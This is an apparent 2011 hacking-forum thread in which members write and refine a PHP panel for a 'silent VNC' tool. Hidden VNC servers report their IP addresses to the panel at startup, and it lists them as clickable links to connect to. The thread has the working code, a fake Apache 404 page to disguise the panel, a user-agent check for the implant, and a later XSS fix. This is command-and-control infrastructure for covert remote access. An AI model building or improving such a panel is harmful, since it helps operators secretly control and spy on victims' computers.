EvilZone

Programming and Scripting => Web Oriented Coding => : bubzuru November 13, 2011, 04:23:29 AM

: [PHP help ?] Ip Logger
: bubzuru November 13, 2011, 04:23:29 AM

:

<?php

if(isset($_GET["log"])){
   $ipfile = 'ips.txt'; //make this filename random, dont want people stealing your servers 
   $ip = $_SERVER['REMOTE_ADDR'];  //the ip adrress off the vnc server 
 
   //read all our server ips into a string 
   $lines = file_get_contents($ipfile,true);
   //check if the server ip is allready in the string
   if(strpos($lines,$ip) !== false) { //fucked up strpos ,, ip might be on the first line (!==)
      //do nothing ,, i suck at php, this is what 3yrs does to you
   }else{
     $fh = fopen($ipfile, 'a') or die("Make the ip file"); //open ip file 
     fwrite($fh, $ip."\r\n"); //wrie server ip to end of file. put on new line for later use (tabel, foreach ?)
     fclose($fh); //close our ip file
   } 
}

?>

ok so iv coded a basic ip logger for silent vnc
the server will visit the logger "?log=1" every time it starts up.
the logger works fine , but can anyone make it better , more functinal

maybe add a "server viewer (with password ,nice ui)"  just list the ips in a table or some shit, just make it better , anyone who helps will get credit , have fun :)

: Re: [PHP help ?] Ip Logger
: xzid November 13, 2011, 09:10:14 AM

I would suggest a fake 404, example on apache:

:

<?php
// your code
header("HTTP/1.1 404 Not Found");
// attempt to match headers to your HTTP server
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER["REQUEST_URI"]; ?> was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["SERVER_NAME"]." Port ".$_SERVER["SERVER_PORT"]; ?></address>
</body></html>

-- nothing to see here, move along.

: Re: [PHP help ?] Ip Logger
: bubzuru November 13, 2011, 02:56:42 PM

idea added , makes sense thanx

: Re: [PHP help ?] Ip Logger
: ca0s November 13, 2011, 05:43:36 PM

- Cypher those IPs using a password as key.
- Use a custom user-agent for legit VNC connections. If not matching, lof it too in another file. You may want to know who is trying to look at your shit.
- Use SQL instead of a text file. Easier to sort and view.

Something like this (coded here, not tested, incomplete, and putting on together xzid's idea):

:

<?php
$con=mysql_connect("user", "pass", "server");
mysql_select_db("logs", $con);
$ip=cryptMyShit($_SERVER['REMOTE_ADDR']);
if($_SERVER['HTTP_USER_AGENT']=="SilentVNC")
{
    $res=mysql_query("SELECT id FROM logs WHERE ip = '".$ip."'");
    if(($row=mysql_fetch_row($res))==FALSE)
       mysql_query("INSERT INTO logs (ip) VALUES (".$ip.");");
}
else
    mysql_query("INSERT INTO fuckerz (ip) VALUES (".$ip.");");

header("HTTP/1.1 404 Not Found");
// attempt to match headers to your HTTP server
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER["REQUEST_URI"]; ?> was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["SERVER_NAME"]." Port ".$_SERVER["SERVER_PORT"]; ?></address>
</body></html>


: Re: [PHP help ?] Ip Logger
: bubzuru November 13, 2011, 09:30:50 PM

ok thanx for the input

Encrypted Ips\Server Info : to be added (next version)

Custom UserAgent : adding it to the ip logger now ( php script will just discard wrong ua's (for now) )

SQL: setting up a sql server may be to advanced for my user base , just going to use text files (easy setup , i dont need to do anything to advanced with the data anyway)

here is the current script

:

<?php
//
//
//
$viewpass = "password"; //viewer password goto logger.php?view=password
$ipfile = 'ips.txt'; //make this filename random, dont want people stealing your servers 

if(isset($_GET["log"])){    
   $ip = $_SERVER['REMOTE_ADDR'];  //the ip adrress off the vnc server 
 
   //read all our server ips into a string 
   $lines = file_get_contents($ipfile,true);
   //check if the server ip is allready in the string
   if(strpos($lines,$ip) !== false) { //fucked up strpos ,, ip might be on the first line (!==)
      //do nothing ,, i suck at php, this is what 3yrs does to you
   }else{
    $fh = fopen($ipfile, 'a') or die("Make the ip file"); //open ip file 
     fwrite($fh, $ip.":".$_GET['id']."\r\n"); //wrie server ip\info to end of file. put on new line for later use (tabel, foreach ?)
     fclose($fh); //close our ip file
   } 
}elseif(isset($_GET["view"]) && $_GET["view"] == $viewpass){
   $lines = file($ipfile); 
   echo "<center><table border='1' cellpadding='8'>\n";
   echo "<tr>\n";
   echo "  <td>Server Num</td>\n";
   echo "  <td>Server Ip</td>\n";
   echo "  <td>Server Info</td>\n";
   echo "</tr>\n";
   foreach ($lines as $line_num => $line) { 
     $split = explode(":",$line);
    echo "<tr>\n";
     echo "  <td><font color='blue'> Server " . $line_num . "</font> : </td>\n";
    echo "  <td> <a href='http://".$split[0].":5800' target='_blank'>" . $split[0] . "</a></td>\n" ; 
    echo "  <td>".$split[1]."</td>\n";
     echo "</tr>\n"; 
   }
   echo "</table></center>\n";
   exit(1);
}

header("HTTP/1.1 404 Not Found");

?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER["REQUEST_URI"]; ?> was not found on this server.</p>
<hr>
<address>Apache Server at <?php echo $_SERVER["SERVER_NAME"]." Port ".$_SERVER["SERVER_PORT"]; ?></address>
</body></html>


: Re: [PHP help ?] Ip Logger
: ca0s November 14, 2011, 12:31:58 PM

:

..
     fwrite($fh, $ip.":".$_GET['id']."\r\n");
..
     echo "  <td>".$split[1]."</td>\n";
..

XSS.
Quick fix:

:

echo "  <td>".htmlentities($split[1], ENT_QUOTES)."</td>\n";